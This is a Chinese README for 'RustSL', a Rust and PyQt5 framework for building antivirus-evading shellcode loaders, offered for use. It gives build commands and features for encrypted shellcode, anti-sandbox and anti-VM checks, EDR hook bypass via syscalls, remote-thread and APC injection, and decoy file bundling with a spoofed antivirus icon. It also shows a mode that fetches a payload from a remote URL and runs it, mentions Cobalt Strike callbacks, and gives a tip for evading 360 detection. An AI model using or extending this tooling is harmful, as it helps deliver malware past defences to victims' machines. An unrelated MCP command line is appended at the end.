一款基于 Rust 开发的模块化免杀框架,支持 GUI 可视化与灵活的二次开发,内置多种 Shellcode 伪装与反沙箱策略。
新增了syscall版的RustSL,感兴趣的可以查看RustSL-Syscall

config/plugins.json 配置文件动态加载功能模块,新插件只需实现特定接口(如 name 和 process 函数),即可自动被 GUI 和命令行工具识别,无需修改核心代码。encrypt_lib/、src/decrypt/、src/exec_shellcode/、src/guard/),便于单独开发和维护。RustSL/
├── gui/ # PyQt5 图形界面与组件
├── src/ # Rust 核心代码
│ ├── main.rs # Rust 主程序入口
| ├── thunk.rs # Windows 7 兼容性支持模块
│ ├── alloc_mem/ # 内存分配相关模块
│ ├── decrypt/ # Shellcode 解密模块
│ ├── exec/ # Shellcode 执行模块
│ ├── forgery/ # 资源伪造与混淆
│ ├── guard/ # 反沙箱/反虚拟机检测
│ └── utils/ # 工具函数
├── RustVEHSyscalls/ # VEH Syscall 实现(绕过EDR钩子)
├── rsl-macros/ # 自定义混淆流
├── bundle/ # 默认捆绑文件目录
├── config/
│ └── plugins.json # 插件与功能配置
├── encrypt_lib/ # Python 加密插件目录
├── sign/ # 签名相关
├── encrypt.py # Shellcode 加密脚本
├── main.py # GUI 启动入口
├── Cargo.toml # Rust 项目配置文件
├── build.rs # Rust 构建脚本
├── requirements.txt # Python 依赖列表
├── input/ # Shellcode 输入目录
├── output/ # 生成的可执行文件输出目录
├── static/ # 静态资源(如图片、截图)
├── icons/ # 额外图标资源
└── rust-toolchain.toml # Rust 工具链配置
pip install -r requirements.txt
依赖说明:
- PyQt5 - 图形界面框架
- pycryptodome - 加密库(ChaCha20, AES-GCM, RC4 等)
本项目依赖 Rust Nightly 版本及 build-std 特性以优化体积和去除特征。
下载并运行 rustup-init.exe
配置 Nightly 工具链
项目根目录已包含 rust-toolchain.toml,进入目录后 Rustup 会自动检测。你需要手动安装 Nightly 工具链及源码组件:
```bash
# 安装 nightly 工具链
rustup install nightly
# 安装 rust-src 组件(用于 build-std 重新编译标准库) rustup component add rust-src --toolchain nightly
# 添加 Windows MSVC 目标(通常默认已安装) rustup target add x86_64-pc-windows-msvc --toolchain nightly ```
bash
cargo +nightly --versionbash
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/envbash
rustup install nightly
rustup component add rust-src --toolchain nightly
rustup target add x86_64-pc-windows-gnu --toolchain nightlybash
sudo apt update
sudo apt install gcc-mingw-w64bash
sudo pacman -S mingw-w64-gccmacOS (使用 Homebrew):
bash
brew install mingw-w64
验证环境
bash
cargo +nightly --version
python main.py
在 GUI 界面中选择需要的配置选项
点击 "一键生成" 按钮,程序将自动完成:
- Shellcode 加密
- Rust 编译(带特性选择)
- 文件复制到 output/ 目录
对于启用了分离式加载( load_payload_cmdline) 特性的构建版本,可以通过命令行指定payload地址:
# 默认读取编译时配置的地址
./rsl.exe
# 指定本地文件路径
./rsl.exe C:\path\to\payload.bin
# 指定远程URL
./rsl.exe http://example.com/payload.bin
在GUI中选择"分离式加载"方式时,会显示一个输入框用于设置默认payload地址。
python encrypt.py -i input/calc.bin -o output/encrypt.bin -m rc4 -e base64
要启用 Windows 7 兼容性构建,您需要下载并配置以下两个兼容性库:
VC-LTL5 是一个轻量级的 Windows 运行时库,提供了对 Windows 7 的向下兼容支持。
下载地址:https://github.com/Chuyu-Team/VC-LTL5/releases
推荐版本:VC-LTL-5.2.2-Binary.zip
YY-Thunks 提供了对较新 Windows API 的向下兼容 thunk 实现。
下载地址:https://github.com/Chuyu-Team/YY-Thunks/releases
推荐版本:YY-Thunks-1.1.7-Binary.zip
下载并解压上述两个库后,需要设置以下环境变量:
VC_LTL,变量值:C:\path\to\VC-LTL5YY_THUNKS,变量值:C:\path\to\YY-Thunks然后就可以使用Win7兼容模式编译加载器了。
也可以单独使用加密脚本:
python encrypt.py -i input/calc.bin -o output/encrypt.bin -m rc4 -e base64
参数:
- -i, --input - 输入的二进制文件
- -o, --output - 输出的加密文件
- -m, --method - 加密方式
- -e, --encode - 编码方式
encrypt.py 已重构为插件化:所有加密/编码方式都以插件形式放在 encrypt_lib/ 目录下。name 字符串和 process(data, args) 函数,encrypt.py 会自动扫描并加载它们。若想添加新插件:
1. 在 encrypt_lib/ 中新增 .py 文件。
2. 在文件中导出 name 和 process(data, args),也可以提供 add_arguments(parser) 来扩展 CLI 参数。
3. 重新运行 encrypt.py,新插件会自动被发现。
使用 Cargo features 控制编译功能:
# 示例:启用 IPv4 解密 + CreateThread 运行 + Tick 检测 + 鼠标检测 + 桌面文件检测
set "RSL_ICON_PATH=icons\avp_0000.ico" && cargo build --release --no-default-features --features=decrypt_ipv4,base64_decode,run_create_thread,alloc_mem_va,vm_check_tick,vm_check_mouse,vm_check_desktop_files
# 示例:启用文件捆绑功能
set "RSL_BUNDLE_FILE=C:\path\to\your\file.pdf" && set "RSL_BUNDLE_FILENAME=document.pdf" && cargo build --release --no-default-features --features=decrypt_ipv4,base64_decode,run_create_thread,alloc_mem_va,with_forgery
# 示例:启用分离式加载(从命令行读取payload地址)
set "RSL_ICON_PATH=icons\avp_0000.ico" && set "RSL_DEFAULT_PAYLOAD_ADDRESS=payload.dat" && cargo build --release --no-default-features --features=decrypt_ipv4,base64_decode,run_create_thread,alloc_mem_va,load_payload_cmdline
src/exec/ 中实现执行逻辑Cargo.toml 中添加 featureconfig/plugins.json 中注册src/alloc_mem/ 中实现分配逻辑Cargo.toml 中添加 featureconfig/plugins.json 中注册src/guard/ 中实现执行逻辑Cargo.toml 中添加 featureconfig/plugins.json 中注册

上线CS:




360启发式检测,如果是QVM202报毒,可以尝试切换icon和签名
本工具仅供安全研究和教育目的使用。使用者需遵守当地法律法规,不得用于非法用途。作者不对任何滥用行为承担责任。
本项目采用 MIT 许可证 - 详见 LICENSE 文件。
encrypt.py 重构为插件化架构,支持动态加载加密插件。encrypt_lib/ 目录。重构并增加远程注入支持
decrypt函数,返回原始长度和指针。create_remote_thread 实现远程线程注入。early_bird_apc 注入方法。target.rs 生成逻辑从GUI移至 build.rs,通过feature环境变量控制icon.rc 生成逻辑从GUI移至 build.rs,通过环境变量控制src/alloc_mem/mapview.rs 中实现 MapViewOfFile 内存分配。src/alloc_mem/heapalloc.rs 中实现 HeapAlloc 内存分配。encrypt_lib/xchacha20.py 中实现XChaCha20加密插件。src/decrypt/xchacha20.rs 中实现对应的解密模块。encrypt_lib/ecc.py 中实现ECC加密插件。src/decrypt/ecc.rs 中实现对应的解密模块。参考了arsenal_kit的一些思路。
$ claude mcp add RustSL \
-- python -m otcore.mcp_server <graph>